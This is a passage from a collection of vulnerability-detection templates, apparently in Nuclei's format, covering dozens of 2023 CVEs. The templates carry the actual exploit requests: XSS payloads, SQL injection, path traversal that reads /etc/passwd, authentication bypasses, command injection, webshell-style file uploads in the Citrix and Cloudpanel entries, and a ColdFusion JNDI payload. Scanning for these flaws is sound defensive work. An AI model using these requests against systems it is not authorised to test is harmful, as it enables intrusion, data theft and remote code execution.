\"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=5","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code 